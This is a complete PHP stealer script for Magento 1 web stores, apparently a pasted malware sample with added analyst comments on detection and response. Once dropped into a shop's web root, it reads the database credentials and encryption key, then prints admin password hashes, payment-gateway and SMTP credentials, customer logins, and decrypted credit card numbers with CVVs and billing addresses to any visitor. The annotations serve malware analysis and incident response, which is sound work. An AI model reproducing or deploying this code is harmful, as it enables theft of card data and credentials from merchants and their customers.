greyx

MAGENTO - stealing information

Apr 30th, 2017
<?php
// Analyst notes (defensive annotation; the code below is unchanged from the sample).
// The page describes itself in its own <title> as "MAGENTO - stealing information":
// a single-file PHP page built to sit inside a Magento 1 web root (it relies on
// app/etc/local.xml and app/Mage.php further down). On every request it runs the
// collection logic below and writes the results straight into the HTTP response.
// Nothing in this listing checks a password, token or source address, so anyone who
// can reach the URL receives the same output.
//
// Stable strings for triage/signature matching in this sample: the <title> text,
// the "[M A G E N T O] - Stealing Information" banner and the "coder:" credit line.

// Lifts PHP's execution time limit; the leading @ hides the warning if that is refused.
@set_time_limit(0);

// Static HTML/CSS banner. The form posts back to the same URL with a hidden
// form_action=2 field, but nothing in this listing reads $_POST, so the form has no
// effect here. The <FORM> element is never closed.
echo'<head>
<title>MAGENTO - stealing information</title>
</head>
<div id="page-wrap">
<body>
<style type="text/css">
body,table { font-family:verdana;font-size:9px;color:#CCCCCC;background-color:#333333; }
table { width:100%; border-color:#333333;border-width:0pt 1pt; border-style:solid; }
td {background-color: #000500; font-family: Courier New; font-size:8pt; color:#999999; border-color:#FFFFFF; border-width:1pt 0pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:middle;}
A:Link, A:Visited { color: #999999; text-decoration: none; }
A.no:Link, A.no:Visited { text-decoration: none; }
A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: #666666; background-color:#333333; text-decoration: none; }
input,select,option { font:8pt tahoma;color:#666666;margin:2;border:1px solid #666666; }
textarea { color:#666666;font:verdana bold;border:1px solid ;margin:2; }
.fleft { float:left;text-align:left; }
.fright { float:right;text-align:right; }
#pagebar { font:8pt tahoma;padding:5px; border:3px solid #333333; border-collapse:collapse; }
#pagebar td { vertical-align:top; }
#pagebar p { font:8pt tahoma;}
#pagebar a { font-weight:bold;color:#666666; }
#pagebar a:visited { color:#00CE00; }
#mainmenu { text-align:center; }
#mainmenu a { text-align: center;padding: 0px 5px 0px 5px; }
#maininfo,.barheader,.barheader2 { text-align:center; }
#maininfo td { padding:3px; }
.barheader { font-weight:bold;padding:5px; }
.barheader2 { padding:5px;border:2px solid #333333; }
.contents,.explorer { border-collapse:collapse;}
.contents td { vertical-align:top; }
.mainpanel { border-collapse:collapse;padding:5px; }
.barheader,.mainpanel table,td { border:1px solid #333333; }
.mainpanel input,select,option { border:1px solid #333333;margin:0; }
input[type="submit"] { border:1px solid #333333; }
input[type="text"] { padding:3px;}
.fxerrmsg { color:red; font-weight:bold; }
#pagebar,#pagebar p,h1,h2,h3,h4,form { margin:0; }
#pagebar,.mainpanel,input[type="submit"] { background-color:black; }
.barheader2,input,select,option,input[type="submit"]:hover { background-color:black; }
textarea,.mainpanel input,select,option { background-color:#000000; }
// -->
</style>
 
<body bgcolor="#ffffff" >
 
<center>
<br>
<FORM action=""  method="post">
<div align="center">[M A G E N T O] - Stealing Information<br>
<div align="center">coder: sohai & n4KuLa_<br>
<input type="hidden" name="form_action" value="2">
</div>
</div>
';
  57.  
  58.  
// Collection stage (analyst annotation; code unchanged). Runs only when
// <DOCUMENT_ROOT>/app/etc/local.xml exists and holds a default_setup connection node.
//
// Detection: a PHP file that is not part of the application's own code tree and that
// opens app/etc/local.xml, issues direct SQL and prints the result is a strong
// indicator. File-integrity monitoring of the web root and static scanning for that
// path alongside raw SQL calls both catch this pattern.
// Response when this file is found on a host: treat the database credentials, the
// crypt key, back-office accounts, payment-gateway and SMTP credentials, and any
// stored card data it can reach as disclosed; rotate them, and review web-server
// access logs for requests to this file's URL to bound the exposure window. How the
// file got written to the web root is a separate question this listing cannot answer.
if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){
    $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');
    if(isset($xml->global->resources->default_setup->connection)) {
       // Database connection settings (host, username, password, dbname are read below).
       $connection = $xml->global->resources->default_setup->connection;
       // Table prefix: read and echoed, but the queries below use unprefixed table names.
       $prefix = $xml->global->resources->db->table_prefix;
       // The installation's encryption key; it is what makes the decrypt() calls below work.
       // NOTE(review): the 32-hex value in the author's trailing comment looks like a key
       // left over from an earlier run; treat it as an identifying string for this sample
       // rather than as data from the host under investigation.
       $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1
       // Loads the application bootstrap from the same web root.
       require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';

       try {
           $app = Mage::app('default');
           Mage::getSingleton('core/session', array('name'=>'frontend'));
       }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}

       // Uses the legacy ext/mysql API (removed in PHP 7.0), so this sample can only
       // run on PHP 5.x hosts. A failed connect only prints the error; execution continues.
       if (!mysql_connect($connection->host, $connection->username, $connection->password)){
           print("Could not connect: " . mysql_error());
       }
       mysql_select_db($connection->dbname);
       // Writes DB host, user, password, schema name, table prefix and crypt key into
       // the HTTP response, pipe-separated.
       echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key<br/>\n";

    // Cipher helper defined at the bottom of this file, keyed with the value from local.xml.
    $crypto = new Varien_Crypt_Mcrypt();
    $crypto->init($key);

    //=========================================================================================================
    // Section 1: active back-office accounts from admin_user. The password column is
    // printed exactly as stored (no decrypt() call in this section).
    $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");
    if (!$query){
          echo "<center><b>Gagal</b></center>";
    }else{
            // Section header shows the store's web/unsecure/base_url config value.
            $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));
          echo'<br><br>
               ====================================================================<br>
                               [ Admin FROM website : '.$site['website'].'] <br>
               ====================================================================<br>';
    }
    echo "
   <table border='1' align='center' >
   <tr>
   <td>id</td>
   <td>firstname</td>
   <td>lastname</td>
   <td>email</td>
   <td>username</td>
   <td>password</td>
   </tr>";
        while($vx = mysql_fetch_array($query)) {
        $no = 1;
        $user_id = $vx['user_id'];
        $username = $vx['username'];
        $password = $vx['password'];
        $email = $vx['email'];
        $firstname = $vx['firstname'];
        $lastname = $vx['lastname'];
        echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";
        }
    echo "</table><br>";
    //=========================================================================================================
    // Section 2: Authorize.net gateway settings (payment/authorizenet/login and
    // payment/authorizenet/trans_key in core_config_data). Both values are passed
    // through decrypt() before being printed.
    $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where  path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");
    if(mysql_num_rows($query) != 0){
        if (!$query){
              echo "<center><b>Gagal</b></center>";
        }else{
              echo'<br><br>
                   ====================================================================<br>
                                   [ Authorizenet ] <br>
                   ====================================================================<br>';
        }
        echo "
       <table border='1' align='center' >
       <tr>
       <td>no</td>
       <td>user</td>
       <td>pass</td>  
       </tr>";
            $no = 1;
            while($vx = mysql_fetch_array($query)) {
            $user = $crypto->decrypt($vx['user']);
            $pass = $crypto->decrypt($vx['pass']);


            echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
            $no++;
            }
        echo "</table><br>";
    }
    //=========================================================================================================
    // Section 3: outbound-mail settings under system/smtpsettings/* (host, port,
    // username, password). Values are printed as stored; no decrypt() call here.
    // NOTE(review): these config paths presumably belong to an add-on SMTP module
    // rather than the core application; confirm on the affected install.
    $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");
    if(mysql_num_rows($query_smtp) != 0){
        if (!$query_smtp){
              echo "<center><b>Gagal</b></center>";
        }else{
              echo'<br><br>
                   ====================================================================<br>
                                   [ SMTP ] <br>
                   ====================================================================<br>';
        }
        echo "
       <table border='1' align='center' >
       <tr>
       <td>no</td>
       <td>host</td>      
       <td>port</td>
       <td>user</td>
       <td>pass</td>  
       </tr>";
            $no = 1;
            $batas = 0;
            while($rows = mysql_fetch_array($query_smtp)) {
                $smtphost = $rows[0];
                $smtpport = $rows[1];
                $smtpuser = $rows[2];
                $smtppass = $rows[3];
                echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";
                $no++;
            }
        echo "</table><br>";
    }
    //=========================================================================================================
    // Section 4: payment records. The first query reads quote-stage payments
    // (sales_flat_quote_payment), the second reads order payments
    // (sales_flat_order_payment, only rows with a non-empty cc_number_enc); each is
    // joined to its billing address. cc_number_enc and cc_cid_enc / cc_cid_status are
    // passed through decrypt() before printing.
    // Defender takeaway: every field reachable here exists only because the store kept
    // card data in its own database, encrypted under a key that sits in a file on the
    // same host. Keeping card numbers and security codes out of the database removes
    // this section's yield.
    $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");
    $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
    if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){
          echo'<br><br>
               ====================================================================<br>
                               [ Credit Card ] <br>
               ====================================================================<br>';
            echo "
           <table border='1' align='left' >
           <tr>
           <td>no</td>
           <td>Date</td>
           <td>Credit Owner</td>
           <td>method</td>
           <td>Credit Number</td>
           <td>Credit Exp</td>
           <td>CVV</td>
           <td>Address</td>
           </tr>";
                $no = 1;
                $batas = 0;
                while($vx = mysql_fetch_array($query)){
                $date = $vx['updated_at'];
                $cc_owner = $vx['cc_owner'];
                $method = $vx['method'];
                $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);
                $exp = $vx['exp'];      
                $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);  
                $Billing_Address = $vx['Billing Address'];
                echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";
                $batas = $no++;
                }

                while($vx2 = mysql_fetch_array($query2)){
                    $batas +=1;
                $cc_owner = $vx2['cc_owner'];
                $method = $vx2['method'];
                $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);
                $exp = $vx2['exp'];    
                $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);
                $Billing_Address = $vx2['Billing Address'];
                echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";
                 $batas++;
                }    

            echo "</table><br>";    
    }
    //=========================================================================================================
    // Section 5: customer logins. The first query pairs customer_entity.email with the
    // customer_entity_varchar value for attribute_id=12 and prints it as stored; the
    // second reads customer_email/password_hash from sales_flat_quote and passes
    // password_hash through decrypt().
    // NOTE(review): attribute_id=12 is presumably the customer password-hash attribute;
    // confirm against eav_attribute on the affected install.
    $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");
    $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");


    if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){
        if (!$query){
              echo "<center><b>Gagal</b></center>";
        }else{
              echo'<br><br>
                   ====================================================================<br>
                                   [ Customer ] <br>
                   ====================================================================<br>';
        }
        echo "
       <table border='1' align='center' >
       <tr>
       <td>no</td>
       <td>user</td>
       <td>pass</td>  
       </tr>";
            $no = 1;
            $batas = 0;
            while($vx = mysql_fetch_array($query)) {
                $user = $vx['email'];
                $pass = $vx['value'];
                echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
                $batas = $no++;
            }

            if(mysql_num_rows($query2) != 0 && ($query2)){
                while($vx2 = mysql_fetch_array($query2)){
                    $user = $vx2['customer_email'];
                    $pass = $crypto->decrypt($vx2['password_hash']);
                    if(!empty($user) && !empty($pass)){ //show the row only when both values are present; otherwise skip it
                        $batas +=1;
                        echo "<tr><pre><td>$batas</td><td>$user</td><td>$pass</td></pre></tr>";
                        $batas++;
                    }
                }              
            }

        echo "</table><br>";
    }
    //=========================================================================================================
  }
}
/**
 * Append $data to the file named by $format (opened in 'a' mode), then close it.
 *
 * The fopen() result is not checked before fwrite()/fclose(). Nothing in this
 * listing calls save(); all output shown here goes to the HTTP response instead.
 * NOTE(review): its presence suggests other variants write results to disk, so a
 * host check should also look for unexpected data files near the script; confirm.
 *
 * @param string $format path of the file to append to
 * @param string $data   bytes to write
 */
function save($format,$data){
    $fp = fopen($format, 'a');
    fwrite($fp, $data);
    fclose($fp);
}
/**
 * Report whether $string is canonical base64.
 *
 * Three checks, any of which returns false: the string must match the base64
 * alphabet pattern (letters, digits, "/", "+", CR/LF, up to two trailing "=");
 * a strict base64_decode() must yield a truthy value (so input that decodes to
 * "" or "0" is also rejected); and re-encoding the decoded bytes must compare
 * equal (loose !=) to the input. Nothing in this listing calls cekbase64().
 *
 * @param string $string candidate base64 text
 * @return bool
 */
function cekbase64($string){
        $decoded = base64_decode($string, true);
        if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;
        if(!base64_decode($string, true)) return false;
        if(base64_encode($decoded) != $string) return false;
        return true;//the return value is 1 when true
    }
//---- used to decode (decrypt) the stored passwords ----/
// Stand-alone cipher wrapper carrying the same class name as the application's own
// Varien_Crypt_Mcrypt. It drives the mcrypt extension (removed from PHP core in 7.2)
// with Blowfish in ECB mode. The original exception throws are commented out and
// replaced by "return null". The script above keys it with crypt/key from local.xml
// and uses decrypt() on config values and payment fields, which shows that the
// confidentiality of those encrypted columns rests entirely on that one file.
class Varien_Crypt_Mcrypt{
    /**
     * Constructor. Takes no arguments and does nothing; init() performs the setup.
     */
    public function __construct()
    {
    }

    /**
     * Initialize the mcrypt module.
     *
     * Opens a Blowfish/ECB handle into $this->handler (a property this class never
     * declares), builds an IV with MCRYPT_RAND, and initializes the cipher with $key.
     * When the key has more UTF-8 characters than the cipher's maximum key size, it
     * returns null without initializing the cipher; the handle is already stored on
     * the object at that point.
     *
     * @param string $key cipher private key
     * @return Varien_Crypt_Mcrypt|null $this on success, null when the key is too long
     */
    public function init($key)
    {
        $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');
        $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);
        $maxKeySize = mcrypt_enc_get_key_size($this->handler);

        if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {
            //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);
            return null;
        }

        mcrypt_generic_init($this->handler, $key, $iv);

        return $this;
    }

    /**
     * Encrypt data and return it base64-encoded.
     *
     * Returns null when no handler is set and returns empty input unchanged.
     * The script in this listing never calls encrypt().
     *
     * @param string $data source string
     * @return string|null
     */
    public function encrypt($data)
    {
        if (!$this->handler) {
            //throw new Varien_Exception('Crypt module is not initialized.');
            return null;
        }
        if (strlen($data) == 0) {
            return $data;
        }
        return base64_encode(mcrypt_generic($this->handler, $data));
    }

    /**
     * Decrypt data: base64-decode the input, then run it through the cipher.
     *
     * Returns null when no handler is set and returns empty input unchanged.
     * The result is returned as produced by mdecrypt_generic(); no trimming is done here.
     *
     * @param string $data encrypted string (base64)
     * @return string|null
     */
    public function decrypt($data)
    {
        if (!$this->handler) {
            //throw new Varien_Exception('Crypt module is not initialized.');
            return null;
        }
        if (strlen($data) == 0) {
            return $data;
        }
        return mdecrypt_generic($this->handler, base64_decode($data));
    }


    /**
     * Destruct cipher module: releases the handle via _reset() if one was opened.
     */
    public function __destruct()
    {
        if ($this->handler) {
            $this->_reset();
        }
    }

    /**
     * De-initialize the cipher and close the mcrypt module handle.
     */
    protected function _reset()
    {
        mcrypt_generic_deinit($this->handler);
        mcrypt_module_close($this->handler);
    }
}
  368.  
  369. ?>